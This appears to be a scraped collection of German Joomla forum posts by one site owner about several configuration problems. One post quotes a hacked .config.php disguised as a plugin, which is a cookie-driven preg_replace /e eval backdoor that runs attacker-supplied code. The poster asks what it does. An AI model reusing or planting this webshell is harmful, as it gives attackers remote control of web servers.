Der Browsercache musste noch gelöscht werden. Danach war der Offlinemodus auch bei mir aktiv (nicht nur bei anderen).
Vielen Dank.
Gruß Michael
Der Browsercache musste noch gelöscht werden. Danach war der Offlinemodus auch bei mir aktiv (nicht nur bei anderen).
Vielen Dank.
Gruß Michael
Meine "Spielseite" lässt sich nicht Offline stellen.
- Schalter System --> Konfiguration --> Website offline = JA
- Cache gelöscht
- abgemeldet
Oben rechts auf der Website steht sogar das Icon für "Edit Page" (siehe Anhang).
Was ist das Problem?
Hallo zusammen,
danke für die ausführlichen Hinweise und Warnungen. Dann hat es mal wieder jemand geschafft, meine Seite zu hacken (das erste Mal, kurz bevor Joomla 2 aus der Wartung ging). Ich werde zunächst eine alte Sicherung zurückspielen und dann mit Joomla 4 neu beginnen.
Bis dann
Michael
Strato sperrte meine Website mit folgender Begründung:
ZitatAuf Ihrem Webspace befinden sich 1 schadhafte Dateien. Wir gehen davon aus, dass unbekannte Dritte diese Dateien in Ihren Webspace eingeschleust haben.
Ursache sollte eine .config.php im Root sein. Die Datei wurde 2015 letztmalig geändert. Nach der Löschung dieser Datei wurde nach einem neuen Scan durch Strato meine Website entsperrt. Der Inhalt der .config.php ist im Folgenden aufgeführt. Leider kann ich kein PHP. Daher die Frage: ist diese .config.php nicht immer standardmäßig im Root? Was passiert(e) in der schadhaften PHP bzw. was ist das Risiko?
Viele Grüße
Michael
<?php
/**
* @package Joomla.Plugin
* @subpackage system.instantsuggest
*
* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.
* @license GNU General Public License version 2 or later
*/
/**
* Instant Suggest Ajax
*
* @package Joomla.Plugin
* @subpackage system.instantsuggest
* @since 3.1
*/
class PlgSystemInstantSuggest
{
public function __construct() {
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
}
}
$suggest = new PlgSystemInstantSuggest;
Könnte ein Javascript Problem sein - schalte noch mal ein.
Wie meinst du das? Auch ein mehrmaliges Ein-/Ausschalten des Plugins führt nicht zum Erfolg.
SSL ist eine andere Baustelle.
Schon klar. Es müssen aber Einstellungen in language filter vorgenommen werden.
Gruß Michael
Hatte ich auch ausprobiert, auch den Link über den Browser zu starten zeigt keine Reaktionen.
Ich habe auf das Protostar Template umgeschaltet. Dann wird die Seite zwar geladen, aber Cookiehint meldet sich nicht.
Gruß Michael
Hallo,
ich versuche Cookiehint auf meiner Webseite zum Laufen zu bekommen. Nach dem enabeln (mit default-Konfiguration) und Ordering "first" wird auf meiner Webseite www.michael-jaffke.de nur ein Symbol dauerhaft angezeigt, das immer dann erscheint, wenn das Laden der Webseite länger dauert. Der Rest der Seite ist leer. Der Ladeprozess kommt also nicht zum Ende?
Joomla Version ist 3.10.11
System Cache stand/steht auf OFF
Platform specific caching stand auf YES / eine Änderung auf NO bewirkt keine Änderung
Nach dem disabeln von Cookiehint und einem refresh im Browser wird die Seite direkt geladen.
Jemand eine Idee, was das Problem ist?
Gruß Michael
Hallo Elwood,
ein Plugin System - Sprachkürzel habe ich nicht. Dein Hinweis hat mich aber in die richtige Richtung geführt. Ich habe im Plugin System - language filter den eingekreisten Schalter auf YES gesetzt. Wer immer mir den Schalter auch auf NO gesetzt hat - das Problem ist gelöst. Vielen Dank.
Gruß Michael
Guten Tag,
nach der vergeblichen Installation und Deinstallation von Plugins für das Cookiegeschäft stelle ich fest, dass in meiner URL ein Sprachkürzel auftaucht.
- Vorher: http://www.michael-jaffke.de/blog
- Jetzt: http://www.michael-jaffke.de/en/blog
Mir ist es weder in der Global Configuration gelungen noch mittels Google herauszufinden, das wieder rückgängig zu machen. Hat jemand eine Idee?
Gruß Michael
Auf diesen Zusammenhang mit einem Provider muss man erst Mal kommen.
Vielen Dank. Funktioniert wieder.
Ja. Warum?
Gruß Michael
Nach einer Netzwerkunterbrechung kann ich den Checkin-Status (Vorhängeschloss) bei einem Artikel nicht mehr zurücksetzen. Folgende Dinge habe ich versucht und führten nicht zum Erfolg: Refresh des Browsers, Abmeldung/neue Anmeldung. Checkin beim Artikel oder System/Global Checkin führen zwar dazu, dass das Schloss verschwindet. Man kann den Artikel zwar editieren, aber ein Save/Close ist nicht möglich. Es wird stattdessen die Seite angezeigt, um Ergebnisse lokal auf dem PC zu speichern mit dem vorbelegtem Dateinamen index.
Kennt jemand dieses Problem und die Lösung?
Da die Tags alle auf der rechten Seite einzeln aufgeführt sind, ist der Filter sowieso überflüssig. Habe ich entfernt. Vielen Dank für den Hinweis.
Hallo Christian,
auf der Ebene http://www.michael-jaffke.de/blog handelt es sich um eine Kategorieliste, auf der Ebene http://www.michael-jaffke.de/blog/unterwegs handelte es sich vorher um einen Kategorieblog, jetzt umgestellt auf Kategorieliste.
Dieser Unterschied ist aber nicht relevant für das Problem.
Passt der Inhalt des Kategorieblogs oder der Kategorieliste nicht mehr auf eine Seite, so wird "mittendrin" abgeschnitten und es scheint so, dass Informationen fehlen.
Tatsächlich gibt es aber Folgeseiten, die sichtbar gemacht werden durch Einstellung der Pagination bei dem Menu Item. Default ist "hide", ich habe sie umgestellt auf "show". Nun kann man auf die Folgeseiten blättern zu den "abgeschnittenen" Beiträgen.
Gruß Michael
Hier der Link zur Anzeige der max. 6 existierenden Beiträge unter der Kategorie "unterwegs":
http://www.michael-jaffke.de/blog/unterwegs
Indigo66 Es gibt m.M. keinen Unterschied zwischen den Beiträgen. Ein Neuladen der Seite bewirkt, dass aus der Auswahl der 6 Beiträge immer 4 nach dem Zufallsverfahren angezeigt werden. Wenn ich oft genug die Seite neu geladen habe, sind irgendwann auch mal alle Beiträge angezeigt worden - aber maximal 4 statt der tatsächlichen Anzahl.
chr-hl Eine Veränderung des Wertes #Articles to List = "10" hat keine Auswirkung. Verwendetes Template: Theme3573. Auf Protostar umschalten kann ich nicht, da ich das mal gelöscht habe. Das Wiederherstellen gelingt mir auf die Schnelle nicht, da ich mit einer gefundenen Beschreibung, in der die Datenbankeinträge #_extensions und #_template_styles upgedated werden müssen erstmal prüfen möchte, ob die SQL noch zum aktuellen Datenbankstand 3.9.26 passt.
Gruß Michael58
Guten Tag,
ich habe ein Menuitem vom Typ "Category List" definiert.
Im List Layout ist definiert: Article order = "Random order" und #Articles to List = "10"
Die entsprechende Category enthält sechs Artikel, es werden aber immer nur maximal vier angezeigt. Alle anderen Articles werden nach und nach auch mal angezeigt, wenn man einen Seitenrefresh durchführt. Jedoch nie mehr als vier(!?).
Wo kann diese Restriktion der Anzeige der Artikel unter einer Category aufgehoben werden. Articles to List = "10" scheint es nicht zu sein.
Ich wünsche einen schönen Tag
Michael58
Habe von 3.9.23 auf 3.9.24 umgestellt. Keine weiteren Updates auf Extensions, ggf. Template/Framework. Hoster für beide Websites (3.9.6 / 3.9.24) ist Strato. Bei der 3.9.6-Website traten keine Fehler auf, bei der 3.9.24-Website funktionierten die Änderungen zu allen URL nicht.
Die Wochenendruhe hat aber anscheinend geholfen. Der Fehler ist behoben - wodurch und durch wen auch immer, auf jeden Fall nicht durch mich.
Diese Fehler sind die Besten ...
Thema ist erledigt. Vielen Dank.
Nach dem Update auf 3.9.24 stelle ich fest, dass einige, bereits vor dem Update existierende Artikel im Backend nicht mehr gesaved oder geclosed werden können. Es kommt zu folgender Meldung:
Service Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
Nach aufwändigen Analysen stellte ich fest, dass es eine Gemeinsamkeit der betroffenen Artikel gibt. Sie verwenden externe URLS mit der typischen Schreibweise https://www.blabla... Lässt man das Protokoll http: bzw. https: in der URL weg und schreibt sie folgendermaßen: //www.blabla.. lassen sich die Artikel saven und closen.
In meiner zweiter Website mit Joomla 3.9.6 tritt der Fehler nicht auf. Wo ist die Ursache des Fehlers oder handelt es sich um einen Bug in der neuen Joomla-Version 3.9.24?
=============
System Information
=============
php: Linux localhost 3.10.0-1127.10.1.el7.x86_64 #1 SMP
dbserver: mysql
dbversion: 5.6.42-log
dbcollation: utf8mb4_general_ci
dbconnectioncollation: utf8mb4_general_ci
phpversion: 7.4.14
server: Apache/2.4.46 (Unix)
sapi_name: cgi-fcgi
version: Joomla! 3.9.24 Stable [ Amani ] 12-January-2021 15:00 GMT
platform: Joomla Platform 13.1.0 Stable [ Curiosity ] 24-Apr-2013 00:00 GMT
useragent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
=============
PHP Settings
=============
safe_mode: false
display_errors: false
short_open_tag: true
file_uploads: true
magic_quotes_gpc: false
register_globals: false
output_buffering: false
open_basedir:
session.save_path: xxxxxx
session.auto_start: 0
disable_functions:
xml: true
zlib: true
zip: true
mbstring: true
iconv: true
max_input_vars: 4000
=============
Configuration File
=============
offline: 0
offline_message: This site is down for maintenance.<br />Please check back again soon.
display_offline_message: 1
offline_image:
sitename: xxxxxx
editor: tinymce
captcha: 0
list_limit: 20
access: 1
debug: 0
debug_lang: 0
debug_lang_const: 1
dbtype: mysqli
host: xxxxxx
user: xxxxxx
password: xxxxxx